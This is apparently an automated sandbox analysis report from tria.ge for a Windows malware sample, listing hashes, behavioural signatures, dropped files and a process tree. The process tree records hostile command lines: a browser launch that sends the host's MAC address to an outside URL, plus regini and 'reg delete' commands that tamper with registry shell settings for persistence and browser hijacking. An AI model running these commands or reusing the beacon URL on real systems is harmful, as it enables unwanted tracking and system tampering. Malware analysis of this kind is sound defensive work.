Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30/09/2024, 12:03

General

  • Target

    0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe

  • Size

    192KB

  • MD5

    0135ed6e8402bfffca7678ccb611c700

  • SHA1

    e65fe4fe86c6ca570efeae42aced0c88d5ba8b56

  • SHA256

    d6987124b3688bf43b82c9a28a28f0322f28e4256c323cb296ff8c55e6cec800

  • SHA512

    1ec530d31bb96cf2390413c6a2cacb5e102fc2e54c5d8a895533b0e7382dd72f71a8e244f4597ced243dc1deddf5c5bf37aaa1c6d3b3c03207fb4c152e8bed78

  • SSDEEP

    3072:z/na6WDmrZ5Cn79xvlr2xmOJ5wUuWXcfb0hw7IACb873684yVcx566/znEV/IEeC:z/nuDm9knmhJ4/sMLuO6/zGeEf

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 38 IoCs
  • Modifies Internet Explorer start page 1 TTPs 1 IoCs
  • Modifies registry class 41 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Drops startup file
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Modifies Internet Explorer start page
    • Modifies registry class
    • NTFS ADS
    • Suspicious use of WriteProcessMemory
    PID:3472
    • C:\Program Files (x86)\Internet Explorer\iexplore.exe
      "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://down.biso.cc/b/tj.asp?mac=5E:50:32:4A:DE:FE&tid=0135ed6e8402bfffca7678ccb611c700_JaffaCakes118
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2904
      • C:\Program Files\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://down.biso.cc/b/tj.asp?mac=5E:50:32:4A:DE:FE&tid=0135ed6e8402bfffca7678ccb611c700_JaffaCakes118
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3320
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3320 CREDAT:17410 /prefetch:2
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:3836
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c regini C:\Users\Admin\AppData\Local\Temp\401127_s.ini
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2004
      • C:\Windows\SysWOW64\regini.exe
        regini C:\Users\Admin\AppData\Local\Temp\401127_s.ini
        3⤵
        • Modifies registry class
        PID:3568
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shell" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4720
      • C:\Windows\SysWOW64\reg.exe
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shell" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2028
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c regini C:\Users\Admin\AppData\Local\Temp\401127.ini
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2948
      • C:\Windows\SysWOW64\regini.exe
        regini C:\Users\Admin\AppData\Local\Temp\401127.ini
        3⤵
        • Modifies registry class
        PID:2728
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shell" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3412
      • C:\Windows\SysWOW64\reg.exe
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shell" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:220

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

    Filesize

    471B

    MD5

    5c93309a2b418ef7de0afb3ae82770c2

    SHA1

    1b9d1a371d163274c3831c764f18ce33f529e5f6

    SHA256

    fa0eff22a494037462bc32f5f477044d28d8e7795b8e2ee7724dbe0c646f2b22

    SHA512

    08d71c4cd9ff5df8c53b83bc24fa1ef42c3c205ed08b3a3d38fbc737a68083241c0230a942336f76d0aeb3bf7ffcdc8b8e4f3f82f9f3eba1c7e47af83802af76

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

    Filesize

    404B

    MD5

    9571c5066fd29abb351e98a0e6691cca

    SHA1

    6f03e7c59903e6e147935f708b20466bbc300914

    SHA256

    3f2d29a083bb6be78261af22107c7bfaee7ef30db94c19ad66e6ca72ad74a258

    SHA512

    8be52b82881b90bae863d7051debb6b0ec80bd542745f35569c033f1e242cf89a3c69dadfba3b4090971b89def7fae2a330e4d0c8a054314624b72c7beaa06b2

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\G40JFEW9\suggestions[1].en-US

    Filesize

    17KB

    MD5

    5a34cb996293fde2cb7a4ac89587393a

    SHA1

    3c96c993500690d1a77873cd62bc639b3a10653f

    SHA256

    c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

    SHA512

    e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

  • C:\Users\Admin\AppData\Local\Temp\401127.ini

    Filesize

    533B

    MD5

    908ba1d0818950d4558329f28a3dacd1

    SHA1

    9f8903bb71af35a3d7bf919f229557a78bec622c

    SHA256

    0e57d2f3cfac1ce0dad7d7f962be88f5664192c37a114f94a87467c33809c68f

    SHA512

    c9816f18ceca1bcffc2af44c0304df4c1f966aad9292f8851fc919e4ece9632ed9f16b4ef88be4d4541f0f628789179af4f4780ae742d53299c70f69c774476b

  • C:\Users\Admin\AppData\Local\Temp\401127_s.ini

    Filesize

    630B

    MD5

    b355e0d19856e816015f605878691487

    SHA1

    56f09703d3909cdae020c1a5907e96e3b986835c

    SHA256

    21c303bb3e578ad6b5c2fba21087c1047217cb89d794b32f989cb283f1caf162

    SHA512

    ab7163fbb4170e51f14541c32511b9628d7cdba43907e7ae7c2ae8b6ffffaa0f6fc2df75fb5a35baf3a01bfae0c3ac895a783d73bd44e0c482d1bd234c3e34b0

  • memory/3472-19-0x0000000000400000-0x0000000000439000-memory.dmp

    Filesize

    228KB